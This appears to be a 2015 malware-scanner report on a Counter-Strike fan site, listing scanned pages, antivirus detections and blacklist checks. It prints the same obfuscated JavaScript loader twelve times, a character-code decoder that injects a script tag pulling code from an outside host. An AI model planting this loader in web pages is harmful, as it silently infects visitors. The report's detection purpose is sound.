Malware Scanner report for css-public.3dn.ru

Malicious/Suspicious/Total urls checked: 12/0/17

12 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://css-public.3dn.ru/index/gotovyj_server_wow_wotlk_313/-36-0-36	HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Wed, 22 Jul 2015 05:06:43 GMT Location: http://css-public.3dn.ru/index/gotovyj_server_wow_wotlk_313/0-36-0-36 Server: uServ/3.2.2 Content-Type: application/octet-stream Set-Cookie: 4css-publicuCoz=; path=/; expires=Mon, 22-Jul-2013 05:06:43 GMT; domain=.css-public.3dn.ru;	clean
http://css-public.3dn.ru/index/gotovyj_server_wow_wotlk_313/0-36-0-36	200 OK Content-Length: 28318 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://s36.ucoz.net/src/jquery-1.7.2.js	200 OK Content-Length: 94840 Content-Type: text/javascript	clean
http://s36.ucoz.net/src/ulightbox/ulightbox.js	200 OK Content-Length: 22097 Content-Type: text/javascript	clean
http://s36.ucoz.net/src/uwnd.js?2	200 OK Content-Length: 228554 Content-Type: text/javascript	clean
http://css-public.3dn.ru/	200 OK Content-Length: 24101 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/load	HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Wed, 22 Jul 2015 05:06:45 GMT Location: http://css-public.3dn.ru/load/ Server: uServ/3.2.2 Content-Type: application/octet-stream Set-Cookie: 4css-publicuCoz=; path=/; expires=Mon, 22-Jul-2013 05:06:45 GMT; domain=.css-public.3dn.ru;	clean
http://css-public.3dn.ru/load/	200 OK Content-Length: 25741 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru//forum/	200 OK Content-Length: 31025 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/index/istorija_cs_source/0-7	200 OK Content-Length: 32852 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/index/istorija_cs/0-5	200 OK Content-Length: 30361 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/index/counter_strike_online/0-10	200 OK Content-Length: 27522 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/index/dvizhok_source/0-11	200 OK Content-Length: 42638 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/index/konsol/0-12	200 OK Content-Length: 51842 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/index/skripty/0-13	200 OK Content-Length: 41059 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/index/faq_po_cs/0-14	200 OK Content-Length: 58751 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC
http://css-public.3dn.ru/index/opisanie_oruzhija_cs/0-15	200 OK Content-Length: 78608 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106! 97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!118!115!101!52!97!108!108! 46!114!117!47!105!110!102!111!114!109!101!114!47!51!34!62! 60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports: AntiVir HTML/IFrame.adh Avast JS:Iframe-AMU [Trj] nProtect Trojan.JS.Agent.ENC K7AntiVirus Riskware Emsisoft Trojan.JS.Agent.ENC (B) Comodo TrojWare.JS.Agent.jg DrWeb SCRIPT.Virus Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC Jiangmin Trojan/Script.Gen F-Secure Trojan.JS.Agent.ENC VIPRE Trojan-Clicker.HTML.IFrame.fh (v) F-Prot JS/Dccrypt.H.gen AVG HTML/Framer GData Trojan.JS.Agent.ENC Commtouch JS/Dccrypt.H.gen ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.Agent.ENC

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: css-public.3dn.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 05:06:44 GMT
Server: uServ/3.2.2
Content-Length: 24101
Content-Type: text/html; charset=UTF-8

...24101 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: css-public.3dn.ru
Referer: http://www.google.com/search?q=css-public.3dn.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=css-public.3dn.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://css-public.3dn.ru/

Result: css-public.3dn.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for css-public.3dn.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools